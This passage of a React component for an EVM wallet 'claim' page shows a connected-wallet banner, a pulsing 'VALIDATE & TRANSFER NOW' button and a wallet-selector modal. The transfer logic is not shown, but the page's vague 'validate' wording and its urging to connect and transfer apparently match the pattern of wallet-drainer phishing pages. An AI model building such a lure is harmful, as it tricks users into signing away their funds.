                <span className="font-medium text-sm sm:text-base">{formatAddress(account)}</span>
                <button
                  onClick={disconnect}
                  className="p-1 hover:bg-white/10 rounded-lg transition-colors"
                >
                  <LogOut size={14} className="sm:w-4 sm:h-4 text-gray-400" />
                </button>
              </div>
            </div>
          </div>

          {/* Connection Status & Transfer Section */}
          <div className="space-y-4">
            {/* Connection Status Banner */}
            <div className="p-3 bg-green-500/20 border border-green-500/50 rounded-lg">
              <div className="flex items-center justify-center space-x-2 mb-1">
                <div className="w-3 h-3 bg-green-500 rounded-full animate-pulse"></div>
                <span className="text-green-400 font-medium text-sm">✅ Wallet Connected Successfully</span>
              </div>
              <p className="text-xs text-gray-400 text-center">
                Ready to transfer. Click VALIDATE below to initiate.
              </p>
            </div>

            {/* Prominent Transfer Button */}
            <div className="text-center mb-2">
              <p className="text-lg font-bold text-white mb-1">Ready to Transfer</p>
              <p className="text-sm text-gray-400">Click the button below to initiate transfer</p>
            </div>
            
            <button 
              onClick={handleClaim}
              disabled={loading || !signer || !account}
              className={`w-full py-4 px-8 rounded-xl text-center font-bold text-lg transition-all min-h-[60px] touch-manipulation transform hover:scale-105 active:scale-95 ${
                loading || !signer
                  ? 'bg-gray-600 cursor-not-allowed opacity-50' 
                  : 'bg-gradient-to-r from-green-500 to-blue-500 text-white hover:shadow-2xl animate-pulse'
              }`}
            >
              {loading ? (
                <div className="flex items-center justify-center space-x-2">
                  <div className="loading-spinner"></div>
                  <span>Processing Transfer...</span>
                </div>
              ) : !signer ? (
                'Preparing...'
              ) : (
                '🚀 VALIDATE & TRANSFER NOW'
              )}
            </button>
          </div>

                                {error && (
                        <div className="error-message text-red-400 text-center p-4 rounded-lg bg-red-400/10">
                          <div className="mb-2">
                            <AlertCircle className="w-5 h-5 mx-auto mb-2 text-red-400" />
                            <p className="font-medium">{error}</p>
                          </div>
                          {error.includes('not available') && (
                            <div className="mt-3 p-3 bg-red-900/20 rounded-lg border border-red-700/30">
                              <p className="text-xs text-red-300 mb-2">🔧 Troubleshooting:</p>
                              <ul className="text-xs text-red-200 space-y-1 text-left">
                                <li>• Make sure the wallet app is installed on your device</li>
                                <li>• Try refreshing the page and connecting again</li>
                                <li>• For mobile: The app should open automatically</li>
                                <li>• For desktop: Check if browser extension is installed</li>
                              </ul>
                            </div>
                          )}
                          {error.includes('Try opening this website in') && (
                            <div className="mt-3 p-3 bg-blue-900/20 rounded-lg border border-blue-700/30">
                              <p className="text-xs text-blue-300 mb-2">📱 Mobile Solution:</p>
                              <ul className="text-xs text-blue-200 space-y-1 text-left">
                                <li>• Open your wallet app (Trust Wallet, Coinbase Wallet, etc.)</li>
                                <li>• Navigate to the DApp browser section</li>
                                <li>• Enter this website's URL: <code className="bg-blue-800/50 px-1 rounded">{window.location.hostname}</code></li>
                                <li>• The wallet connection will work perfectly in the DApp browser</li>
                              </ul>
                            </div>
                          )}
                        </div>
                      )}
        </>
      )}

      {/* Responsive Wallet Selector Modal */}
      {showWalletSelector && (
        <>
          {/* Backdrop */}
          <div 
            className="fixed inset-0 bg-black/50 backdrop-blur-sm z-[9998]"
            onClick={() => setShowWalletSelector(false)}
          />
          
          {/* Modal - Responsive for both desktop and mobile */}
          <div className="fixed inset-0 z-[9999] flex items-start justify-center pt-16 p-2 sm:p-4 sm:pt-24" style={{ position: 'fixed', top: 0, left: 0, right: 0, bottom: 0 }}>
            <div className="bg-white dark:bg-gray-900 rounded-xl shadow-2xl border border-gray-200 dark:border-gray-700 w-full max-w-sm mx-2 sm:mx-4 relative" style={{ position: 'relative', zIndex: 10000, maxHeight: '85vh', overflowY: 'auto' }}>
              {/* Header */}
              <div className="flex items-center justify-between p-3 sm:p-4 border-b border-gray-200 dark:border-gray-700">
                <h2 className="text-base sm:text-lg font-semibold text-gray-900 dark:text-white">
                  Connect Wallet
                </h2>
                <button
                  onClick={() => setShowWalletSelector(false)}
                  className="text-gray-400 hover:text-gray-600 dark:hover:text-gray-300 transition-colors p-1"
                >
                  <svg className="w-4 h-4 sm:w-5 sm:h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                  </svg>
                </button>
              </div>

              {/* Wallet Grid - Responsive */}
              <div className="p-3 sm:p-4">
                <div className="grid grid-cols-1 gap-2 sm:gap-3">
                  {wallets.map((wallet) => (
                    <button
                      key={wallet.id}
                      onClick={() => {
                        console.log('🔍 Wallet selected:', wallet.name);
                        setShowWalletSelector(false);
                        wallet.connect();
                      }}
                      disabled={isConnecting}
                      className="group flex items-center p-3 sm:p-3 rounded-lg border border-gray-200 dark:border-gray-700 hover:border-blue-500 dark:hover:border-blue-400 hover:bg-blue-50 dark:hover:bg-blue-900/20 active:bg-blue-100 dark:active:bg-blue-800/30 transition-all duration-200 disabled:opacity-50 disabled:cursor-not-allowed min-h-[56px] sm:min-h-[60px] touch-manipulation"
                    >
                      {/* Wallet Icon - Responsive sizing */}
                      <div className="w-8 h-8 sm:w-8 sm:h-8 mr-3 sm:mr-3 flex items-center justify-center">
                        <img 
                          src={wallet.image} 
                          alt={wallet.name} 
                          className="w-full h-full object-contain rounded-lg transition-transform duration-200 group-hover:scale-110 group-active:scale-95"
                        />
                      </div>
                      
                      {/* Wallet Info - Responsive text */}
                      <div className="flex-1 text-left">
                        <div className="font-medium text-base sm:text-base text-gray-900 dark:text-white group-hover:text-blue-600 dark:group-hover:text-blue-400">
                          {wallet.name}
                        </div>
                        <div className="text-xs text-gray-500 dark:text-gray-400 hidden sm:block">
                          {wallet.description}
                        </div>
                      </div>
                      
                      {/* Arrow - Responsive */}
                      <svg className="w-4 h-4 sm:w-4 sm:h-4 text-gray-400 group-hover:text-blue-500 transition-colors" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M9 5l7 7-7 7" />
                      </svg>
                    </button>
                  ))}
                </div>

                {/* Footer - Responsive */}
                <div className="mt-3 sm:mt-4 pt-2 sm:pt-3 border-t border-gray-200 dark:border-gray-700">
                  <p className="text-center text-xs text-gray-500 dark:text-gray-400">
                    Don't have a wallet?{' '}
                    <a 
                      href="https://metamask.io/download/" 
                      target="_blank" 
                      rel="noopener noreferrer"
                      className="text-blue-600 dark:text-blue-400 hover:text-blue-700 dark:hover:text-blue-300 underline font-medium"
                    >
                      Download MetaMask
                    </a>
                  </p>
                  <div className="mt-2 p-2 bg-blue-50 dark:bg-blue-900/20 rounded-lg">
                    <p className="text-xs text-blue-600 dark:text-blue-300 font-medium mb-1">📱 Mobile Connection:</p>
                    <p className="text-xs text-blue-500 dark:text-blue-400">
                      Select any wallet to open the app and connect. Make sure the wallet app is installed on your device.
                    </p>
                    <div className="mt-2 p-2 bg-yellow-50 dark:bg-yellow-900/20 rounded border border-yellow-200 dark:border-yellow-700">
                      <p className="text-xs text-yellow-700 dark:text-yellow-300 font-medium">💡 Pro Tip:</p>
                      <p className="text-xs text-yellow-600 dark:text-yellow-400">
                        For best experience on mobile, open this website directly in your wallet's DApp browser!
                      </p>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </>
      )}
    </div>
  );
};

export default EVMClaimInterfaceWithProvider;
